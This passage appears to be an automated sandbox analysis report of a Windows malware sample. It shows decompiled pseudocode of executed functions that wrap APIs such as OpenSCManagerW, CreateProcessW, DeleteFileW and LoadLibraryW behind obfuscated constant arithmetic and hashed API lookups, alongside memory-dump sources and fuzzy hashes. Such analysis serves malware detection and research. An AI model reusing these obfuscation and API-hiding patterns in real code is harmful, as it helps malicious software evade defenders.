				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E004C07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x004c7bf7
                                              0x004c7bf8
                                              0x004c7bfa
                                              0x004c7bfd
                                              0x004c7bff
                                              0x004c7c02
                                              0x004c7c06
                                              0x004c7c07
                                              0x004c7c0f
                                              0x004c7c1d
                                              0x004c7c25
                                              0x004c7c2d
                                              0x004c7c31
                                              0x004c7c38
                                              0x004c7c3f
                                              0x004c7c46
                                              0x004c7c4a
                                              0x004c7c5e
                                              0x004c7c67
                                              0x004c7c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 004C7C67
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 70381a5a462efdaaed293b554f2092b78ec6d1e9f5a9197df594307d4a575fd7
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 34014BB590120CFFEB09DFA4C84A9DEBBB9EF44314F20819DF405A7240EAB55F509B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004BF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E004BF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E004B602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E004C07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x004bf662
                                              0x004bf663
                                              0x004bf665
                                              0x004bf668
                                              0x004bf66a
                                              0x004bf66d
                                              0x004bf670
                                              0x004bf673
                                              0x004bf677
                                              0x004bf678
                                              0x004bf67d
                                              0x004bf687
                                              0x004bf693
                                              0x004bf69a
                                              0x004bf6a1
                                              0x004bf6a5
                                              0x004bf6a9
                                              0x004bf6b0
                                              0x004bf6c9
                                              0x004bf6d8
                                              0x004bf6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 004BF6D8
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 435069b96fb85c21a87f9b36a5e7988f3b872b627bc7d8c0ef1d899fcac31deb
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 7601E2B6901208BBEF05EF95DC0A8DF7F79EB05324F148188F90462250E6B65E21EBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004BB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E004BB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E004B602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E004C07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x004bb6f3
                                              0x004bb6f8
                                              0x004bb702
                                              0x004bb70b
                                              0x004bb712
                                              0x004bb719
                                              0x004bb720
                                              0x004bb727
                                              0x004bb72e
                                              0x004bb747
                                              0x004bb759
                                              0x004bb75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 004BB759
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: cf4a406bd5a692bdf229945ca30559f3441c0a5c98b44f5bc83ea2d61d74245b
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 22014BB694130CFBEF45DF94DD06E9E7BB5EF18704F108188FA09661A0D3B25E20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004CAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E004CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E004B602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E004C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x004caa3f
                                              0x004caa40
                                              0x004caa41
                                              0x004caa44
                                              0x004caa47
                                              0x004caa4b
                                              0x004caa4c
                                              0x004caa51
                                              0x004caa5b
                                              0x004caa64
                                              0x004caa68
                                              0x004caa6f
                                              0x004caa76
                                              0x004caa8d
                                              0x004caa90
                                              0x004caa9d
                                              0x004caaa8
                                              0x004caaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 004CAAA8
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: a2c9c40a9dc46210f6a8edc4c3fe7d84c03889ee1dc71ba5db834bfa723db2ca
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: C9F069B590020CFFDF08EF94DD4A99EBFB4EB40304F10809CF805A6250D3B69B549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004B5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E004B5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E004B602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E004C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x004b5fb5
                                              0x004b5fb6
                                              0x004b5fb7
                                              0x004b5fbb
                                              0x004b5fbc
                                              0x004b5fc1
                                              0x004b5fcb
                                              0x004b5fd7
                                              0x004b5fde
                                              0x004b5fe5
                                              0x004b5ffc
                                              0x004b5fff
                                              0x004b6006
                                              0x004b600d
                                              0x004b601a
                                              0x004b6025
                                              0x004b602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 004B6025
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 6fd2a556a2c432c8ffda35aac0df7a61606eff5571ddae2efb7a46724159af71
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: 5FF04FB4C11208FFDB48DFA0E94689EBFB8EB40300F20819CE409A7260E7755F159F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 2276 Parent PID: 2836 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 007D2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E007D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E007D602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E007E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x007d295f
                                              0x007d2964
                                              0x007d2967
                                              0x007d296a
                                              0x007d296d
                                              0x007d296e
                                              0x007d296f
                                              0x007d2977
                                              0x007d2985
                                              0x007d298a
                                              0x007d2992
                                              0x007d299a
                                              0x007d29a2
                                              0x007d29a9
                                              0x007d29b0
                                              0x007d29b7
                                              0x007d29bb
                                              0x007d29cf
                                              0x007d29dc
                                              0x007d29e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 007D29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 05a39dbffed50c4ad3436cc3475ba6677c47cd339c850ea17099bbf4c9c57cfa
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 22018072A01108BFEB14DF95DC0A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007DC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E007DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E007D602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E007E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x007dc6e1
                                              0x007dc6e6
                                              0x007dc6f0
                                              0x007dc6fc
                                              0x007dc703
                                              0x007dc706
                                              0x007dc70d
                                              0x007dc711
                                              0x007dc715
                                              0x007dc71c
                                              0x007dc723
                                              0x007dc72a
                                              0x007dc731
                                              0x007dc738
                                              0x007dc751
                                              0x007dc762
                                              0x007dc768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 007DC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: e271fa5943788af38613e5e792215571654a0b9338f458159ed70c70fc81b739
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 721122B290122DBBCB259F95DC498DFBEB9EF04714F108188B90962210D3B14A659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007D1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E007D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E007D602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E007E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x007d1006
                                              0x007d1009
                                              0x007d100c
                                              0x007d1011
                                              0x007d1016
                                              0x007d101d
                                              0x007d1026
                                              0x007d102d
                                              0x007d1034
                                              0x007d103b
                                              0x007d1047
                                              0x007d104f
                                              0x007d1057
                                              0x007d105e
                                              0x007d1065
                                              0x007d106c
                                              0x007d1073
                                              0x007d1077
                                              0x007d108b
                                              0x007d1096
                                              0x007d109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 007D1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: a4949c34679bac6c417c22de348064d3942f6d8670dd20648a43a981c3ad584d
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: 4E016DB6D0130CFFDF04DF94C94A9DEBBB1EF54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007D4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E007D4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E007E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x007d485e
                                              0x007d487a
                                              0x007d487d
                                              0x007d4884
                                              0x007d488b
                                              0x007d4892
                                              0x007d489d
                                              0x007d48a0
                                              0x007d48ad
                                              0x007d48b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 007D48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: fdd75fa4691ae7a749586fd438cb06727d540914531ef995dca898e456c54a94
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 43F017B0A05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007E4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E007E4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E007D602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E007E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x007e4f80
                                              0x007e4f81
                                              0x007e4f82
                                              0x007e4f86
                                              0x007e4f87
                                              0x007e4f8c
                                              0x007e4fa5
                                              0x007e4fa8
                                              0x007e4faf
                                              0x007e4fb6
                                              0x007e4fc7
                                              0x007e4fca
                                              0x007e4fd7
                                              0x007e4fe2
                                              0x007e4fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 007E4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 5b86f35a09f264319beb6762bf4c441aad0045e5deee6ce89920e36f184c1ddb
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 92F037B081120CFFDF04DFA4D94689EBFBAEB44300F208199E804AB250D3715B509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007E976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E007E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007D602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E007E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x007e9772
                                              0x007e9773
                                              0x007e9778
                                              0x007e977a
                                              0x007e977b
                                              0x007e977e
                                              0x007e977f
                                              0x007e9782
                                              0x007e9785
                                              0x007e9788
                                              0x007e9789
                                              0x007e978c
                                              0x007e978f
                                              0x007e9790
                                              0x007e9791
                                              0x007e9794
                                              0x007e9797
                                              0x007e979a
                                              0x007e979d
                                              0x007e97a0
                                              0x007e97a3
                                              0x007e97a6
                                              0x007e97a7
                                              0x007e97a8
                                              0x007e97ad
                                              0x007e97b7
                                              0x007e97c3
                                              0x007e97ca
                                              0x007e97d1
                                              0x007e97d8
                                              0x007e97df
                                              0x007e97e3
                                              0x007e97fc
                                              0x007e9816
                                              0x007e981d

                                              APIs
                                              • CreateProcessW.KERNEL32(007D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,007D591A), ref: 007E9816
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 9ea2ad3f1c4d5d255f9486fe3e5e8c52e5f239e66027acbc33842f7c26eb52dc
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 4A11B372901188FFDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007DB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E007DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E007D602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E007E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x007db569
                                              0x007db56a
                                              0x007db56d
                                              0x007db572
                                              0x007db574
                                              0x007db577
                                              0x007db57a
                                              0x007db57d
                                              0x007db580
                                              0x007db583
                                              0x007db586
                                              0x007db587
                                              0x007db58a
                                              0x007db58d
                                              0x007db590
                                              0x007db593
                                              0x007db594
                                              0x007db595
                                              0x007db59a
                                              0x007db5a4
                                              0x007db5b8
                                              0x007db5c0
                                              0x007db5c4
                                              0x007db5cb
                                              0x007db5d2
                                              0x007db5d9
                                              0x007db5e6
                                              0x007db5fd
                                              0x007db604

                                              APIs
                                              • CreateFileW.KERNELBASE(007E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,007E0668,?,?,?,?), ref: 007DB5FD
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 486d38c6f467e6bfb2d845806682660bd5f0ae0a5036ec8581d71851b83aa9f1
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
